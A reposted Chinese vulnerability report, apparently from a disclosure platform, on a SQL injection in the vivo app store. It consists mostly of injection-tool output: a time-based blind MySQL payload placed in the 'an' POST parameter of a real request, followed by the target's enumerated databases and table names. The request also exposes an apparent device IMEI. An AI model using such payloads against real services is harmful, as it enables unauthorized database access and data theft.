1. 猴子技术宅首页
  2. web服务器干货教程
  3. 网站安全

vivo应用商店又一处SQL注入(从哪里跌倒从哪里爬起来 )网站安全分享!


— Parameter: an (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697 — back-end DBMS: MySQL 5.0.12 available databases [3]: [*] appcontent [*] information_schema [*] test Database: appcontent [23 tables] +—————————–+ | :ec_manual_catch_apk | | comment_tmp | | t_ac_apk_url | | t_ac_app_info | | t_ac_app_info_all | | t_ac_app_info_hot | | t_ac_app_s | | t_ac_app_screenshot | | t_ac_fail_catch_app | | t_ac_manual_update_apk | | t_ac_single_download | | t_ac_spider_detail_q | | t_ac_spider_detail_template | | t_ac_spider_list_task | | t_ac_spider_list_template | | t_ac_wdj_icon | | t_activity_info | | t_ad_app | | t_ad_click | | t_ad_icon | | t_ad_info | | t_android_permission | | t_apk_delete | +—————————–+


%ignore_pre_1%
 Database: appcontent [23 tables] +-----------------------------+ | :ec_manual_catch_apk       | | comment_tmp                 | | t_ac_apk_url                | | t_ac_app_info               | | t_ac_app_info_all           | | t_ac_app_info_hot           | | t_ac_app_s                  | | t_ac_app_screenshot         | | t_ac_fail_catch_app         | | t_ac_manual_update_apk      | | t_ac_single_download        | | t_ac_spider_detail_q        | | t_ac_spider_detail_template | | t_ac_spider_list_task       | | t_ac_spider_list_template   | | t_ac_wdj_icon               | | t_activity_info             | | t_ad_app                    | | t_ad_click                  | | t_ad_icon                   | | t_ad_info                   | | t_android_permission        | | t_apk_delete                | +-----------------------------+  

www.dengb.comtruehttp://www.dengb.com/wzaq/1119550.htmlTechArticlevivo应用商店又一处SQL注入(从哪里跌倒从哪里爬起来 ) —Parameter: an (POST) Type: AND/OR time-based blind Title: MySQL = 5.0.12 AND time-based blind (SELECT)…

—-想了解更多的网站安全相关处理怎么解决关注<猴子技术宅>

本文来自网络收集,不代表猴子技术宅立场,如涉及侵权请点击右边联系管理员删除。

如若转载,请注明出处:https://www.ssfiction.com/archives/97663

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论列表(1条)

  • vivo应用商店
    vivo应用商店 2020年6月22日 下午3:31

    vivo应用商店又一处SQL注入(从哪里跌倒从哪里爬起来 )网站安全分享!,楼主威武。